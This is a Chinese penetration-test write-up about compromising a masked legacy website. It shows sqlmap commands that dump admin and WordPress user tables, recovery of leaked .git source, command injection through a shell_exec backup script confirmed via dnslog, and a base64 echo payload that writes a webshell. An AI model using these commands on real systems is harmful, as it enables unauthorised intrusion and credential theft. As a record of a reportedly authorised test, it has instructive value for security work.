项目实战 | SQL注入的“格局”

admin 2020年9月13日09:00:53评论298 views字数 2148阅读7分9秒阅读模式

项目实战 | SQL注入的“格局”

0x00 前言

曾经搞站最经典的套路就是:注入拿到密码进后台,上传shell然后内核提权。但是实际环境中,往往会有注入后密码解不开、找不到后台等情况,所以现在有的师傅说sql注入还不如xss。


0x01 详细步骤


一.网站界面就不放了,打码太累了,直接跳到随意点点后发现可疑参数,并确定存在漏洞的截图。


and 1=1页面显示正常,and 1=0页面变空白确定存在数字型注入,order by确定共4列,最后用select 1,2,3,4确定第2列回显。


项目实战 | SQL注入的“格局”


二.之前探测发现没有waf,那就直接sqlmap一把梭。


跑当前库名:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --current-db跑所有数据库名:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --dbs标绿色的为当前数据库:xxx_history


项目实战 | SQL注入的“格局”

    三. 跑当前数据库表名。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history --table

标绿色的表为我认为是存放管理员数据的表:

项目实战 | SQL注入的“格局”


四.直接拖管理表的数据。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history -T administrators --dump


项目实战 | SQL注入的“格局”

居然是明文密码,现在明文密码很少见了,不过考虑到目标网站有点历史悠久,也能理解。


五.虽然获得了管理员密码,但是找不到后台,常用的/admin/login/manage都试了。


项目实战 | SQL注入的“格局”


六.用脚本扫目录,字典用的是御剑的标准字典。得到以下敏感目录(截图不全)。


项目实战 | SQL注入的“格局”


七.git目录存在即git源码泄露漏洞,用GitHack脚本恢复了整站源码,一大坨,截图就不放了,放个数字你们感受下。

python2 GitHack.py https://www.马赛克.com/.git/

项目实战 | SQL注入的“格局”


八.根据名字确定其中疑似后台的目录:

项目实战 | SQL注入的“格局”


.访问试试,/admin1已经404了,因为git中留存的是历史代码,所以目录被改名或删除都有可能。

项目实战 | SQL注入的“格局”

./7mysql7需要输入密码,试了不是之前注出的密码。


项目实战 | SQL注入的“格局”


十一.xxxquestions目录下的wp-admin倒是可以进,但是也不是之前注出的密码。

项目实战 | SQL注入的“格局”


十二.之前看到还有个xxx_questions数据库,再用sqlmap去跑一下试试:

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions --tables


项目实战 | SQL注入的“格局”

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions -T wp_users --dump


项目实战 | SQL注入的“格局”


十三.这种加密是wordpress特有的加密,cmd5有针对该框架的解密,但是这个密码似乎太复杂,解不出。

项目实战 | SQL注入的“格局”


十四.至此sql注入后有密码找不到后台、有后台解不开密码的情况就都碰到了。渗透似乎陷入僵局,没关系,手里的源码还有利用价值,拖到D盾里自动审计一下。

项目实战 | SQL注入的“格局”


十五.访问那个级别5的已知后门,原来已经被人日过了,是个黑页:hacked by XXX。这个网站比较有历史了,可能这个黑页也是很多年前的某个娱乐圈黑客搞的。

项目实战 | SQL注入的“格局”


十六.访问级别4的shell_exec后门,是个空白页面,查看手中的源代码,发现是一个备份脚本,有可能是同行留的,也有可能是没有安全意识的管理员自己写的。后面那种可能性比较大。

项目实战 | SQL注入的“格局”

十七.脚本逻辑:接收了POST的filename参数,然后执行打包备份,但是参数传进shell_exec之前没有做过滤,产生了命令执行的漏洞。用linux的命令连接符分号,可以在后面拼接任意命令,这里尝试一下执行whoami,但是还是空白页面。

项目实战 | SQL注入的“格局”


十八.想到是因为shell_exec函数没有回显,也不知道命令执行成功没有,这里我们用公开免费的dnslog平台去接收没有回显的注入:http://www.dnslog.cn/,用法如下:

先点击Get SubDomain在平台获取一个域名

项目实战 | SQL注入的“格局”



十九.然后执行ping命令,反撇号中的命令会自动执行并返回命令执行的结果拼接到命令里,linux系统使用ping命令要加-c指定次数,不然会一直ping个没完。

项目实战 | SQL注入的“格局”


二十.去平台点击Refresh Record刷新(不要刷新整个网页),获取到解析日志。

项目实战 | SQL注入的“格局”

可以看到命令是执行成功了的。whoami的回显为www-data

 

二十一.确认了漏洞存在,接下来利用漏洞写一句话,注意因为一句话中包含特殊字符,要编码后写入,payload如下

echo base64编码后的一句话|base64 -d > shell.php

(实战中不要用这个文件名,有授权的测试随便,但要注意文件名对waf来说也是一种特征)

项目实战 | SQL注入的“格局”


二十二.写马成功

项目实战 | SQL注入的“格局”

二十三.客户没有授权内网,项目结束。

项目实战 | SQL注入的“格局”

END.




欢迎转发~

欢迎关注~

欢迎点赞~


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月13日09:00:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   项目实战 | SQL注入的“格局”http://cn-sec.com/archives/130608.html

发表评论

匿名网友 填写信息